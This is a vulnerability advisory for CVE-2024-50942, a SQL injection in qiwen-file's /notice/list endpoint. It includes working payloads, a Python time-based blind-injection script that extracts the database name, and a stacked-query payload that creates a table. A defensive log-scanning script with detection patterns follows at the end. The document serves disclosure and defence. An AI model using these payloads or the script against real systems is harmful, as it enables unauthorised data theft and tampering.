@3xsh0re
Created November 20, 2024 01:36
CVE-2024-50942
> [Vulnerability Type]
> SQL Injection
> ------------------------------------------
> [Vendor of Product]
> https://www.qiwenshare.com/
> ------------------------------------------
> [Affected Product Code Base]
> qiwen-file - <= v1.4.0
> ------------------------------------------
> [Affected Component]
> src/main/resources/mapper/NoticeMapper.xml
> ------------------------------------------
> [Attack Type]
> Remote
> ------------------------------------------
> [Impact Information Disclosure]
> true
> ------------------------------------------
> [Attack Vectors]
> /notice/list?title=')/**/AS/**/total/**/UNION /**/(SELECT/**/5211/**/FROM/**/(SELECT/**/IF(SUBSTRING(DATABASE(),1,1)='f',SLEEP(5),0))/**/AS/**/delay);
> ------------------------------------------
> [Attack Analysis]
Controller Layer
- Endpoint: /notice/list
- HTTP Method: GET
- Parameters: only the title parameter is used for the query.
Service Layer
- Method: selectUserPage
- Implementation: simple and without any filtering; the Data Transfer Object (DTO) is passed directly as the query parameters, relying on MyBatis for automatic field mapping.
SQL Injection Testing Process
Step 1: Debugging Output
Enable SQL statement logging in the configuration file so that every executed statement is printed to stdout:
```properties
mybatis-plus.configuration.log-impl=org.apache.ibatis.logging.stdout.StdOutImpl
```
Step 2: Manual Injection Testing
Instead of using automated tools like sqlmap (which failed in this case), manual testing was conducted for SQL injection.
Initial Payloads:
Payload: '--
Result: No errors reported.
Payload: 'union/**/select/**/database()--
Result: An error was reported. Inspecting the SQL execution log showed that the error was caused by a missing closing ): the pagination wraps the original query in an outer SELECT COUNT(*) FROM (...) TOTAL subquery.
Adjusting the payload:
Corrected Payload: ')as/**/total/**/union/**/select/**/database()--
This resulted in the following complete SQL statement:
```sql
SELECT COUNT(*) FROM (SELECT * FROM notice WHERE platform = 3 AND title LIKE '%')as/**/total/**/union/**/select/**/database()-- %' ORDER BY createTime DESC) TOTAL
```
Outcome:
The statement executed successfully in a standalone SQL environment. On the server, however, the injection produced errors because of hardcoded newline characters in the generated query, which prevented the -- comment from consuming the remainder of the statement. Since a ; was needed to terminate the query properly, blind injection was explored instead.
Blind SQL Injection
To test whether SQL statements can be executed, time-based blind SQL injection was used.
Script for Extracting Database Name Using Time-Based Blind Injection:
```python
import requests
import time

url = "http://x.x.x.x:32145/notice/list?title="
headers = {
    'User-Agent': 'Mozilla/5.0'
}
characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_'

def inject_payload(position, char):
    payload = f"')/**/AS/**/total/**/UNION/**/(SELECT/**/5211/**/FROM/**/(SELECT/**/IF(SUBSTRING(DATABASE(),{position},1)='{char}',SLEEP(5),0))/**/AS/**/delay);"
    params = {'title': payload}
    start_time = time.time()
    response = requests.get(url, params=params, headers=headers)
    elapsed_time = time.time() - start_time
    # Check if the server response was delayed
    if elapsed_time > 5:
        return True
    return False

def get_database_name():
    database_name = ""
    for position in range(1, 50):
        for char in characters:
            if inject_payload(position, char):
                database_name += char
                print(f"Found character '{char}' at position {position}")
                break
        else:
            break
    return database_name

# Start the blind injection attack
database_name = get_database_name()
print(f"The database name is: {database_name}")
```
Result:
Since the query could be terminated with ;, stacked queries were attempted. Because the response carries no query output, operations with an observable side effect, such as CREATE and DROP, were tested.
Example Payload for Creating a Table:
```sql
')as/**/total/**/union/**/select/**/database();create/**/table/**/test(birthdate/**/DATE);--%20
```
Outcome:
The server returned a 500 error, but the SQL operation (creating the test table) was nevertheless executed.
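As an added defender-side example (not part of the advisory or of the qiwen-file project), the following Python flags requests to /notice/list whose title parameter has the shape described above: it URL-decodes the value, strips the /**/ comment obfuscation, and then requires both a closed quote and a SQL construct (UNION SELECT, SLEEP/BENCHMARK, or a stacked statement after ;), so an ordinary title containing a word like "union" is not flagged. The log lines are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the advisory): two benign titles, one of
# which contains the word "union", plus the two payload shapes the advisory
# describes (time-based blind and a stacked CREATE TABLE).
SAMPLE_LOG_LINES = [
    "GET /notice/list?title=Maintenance+window HTTP/1.1",
    "GET /notice/list?title=Don%27t+miss+Friday%27s+union+meeting HTTP/1.1",
    "GET /notice/list?title=')/**/AS/**/total/**/UNION/**/(SELECT/**/5211/**/FROM"
    "/**/(SELECT/**/IF(SUBSTRING(DATABASE(),1,1)='f',SLEEP(5),0))/**/AS/**/delay); HTTP/1.1",
    "GET /notice/list?title=')as/**/total/**/union/**/select/**/database();"
    "create/**/table/**/test(birthdate/**/DATE);--%20 HTTP/1.1",
]

# SQL constructs that only make sense once the quoted LIKE literal has been closed.
SQL_PATTERNS = [
    r"\bunion\s*\(?\s*select\b",                        # UNION SELECT / UNION (SELECT
    r"\b(sleep|benchmark)\s*\(",                        # time-based blind primitives
    r";\s*(create|drop|alter|insert|update|delete)\b",  # stacked query after ';'
]

def normalize(value: str) -> str:
    """URL-decode twice (covers double encoding), turn /**/ comments into spaces,
    collapse whitespace and lower-case, so the patterns see plain SQL."""
    decoded = unquote_plus(unquote_plus(value))
    no_comments = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)
    return re.sub(r"\s+", " ", no_comments).strip().lower()

def is_suspicious(title: str) -> bool:
    """Flag only when the value closes the quote (' or ') and continues with SQL
    AND one of the constructs above is present; 'union' in plain text is ignored."""
    norm = normalize(title)
    closes_literal = re.search(r"'\s*\)?\s*(as|union|select|;|--)", norm) is not None
    has_sql = any(re.search(p, norm) for p in SQL_PATTERNS)
    return closes_literal and has_sql

def scan_log(lines):
    """Return (raw line, normalized title) for every flagged /notice/list request."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 2 or not parts[1].startswith("/notice/list"):
            continue
        for pair in parts[1].partition("?")[2].split("&"):  # split on '&' only, never ';'
            key, _, value = pair.partition("=")
            if key == "title" and is_suspicious(value):
                hits.append((line, normalize(value)))
    return hits
```

Running `scan_log(SAMPLE_LOG_LINES)` flags only the two payload lines; the normalized title it returns is what a reviewer would want in the alert, since the comment obfuscation has already been removed.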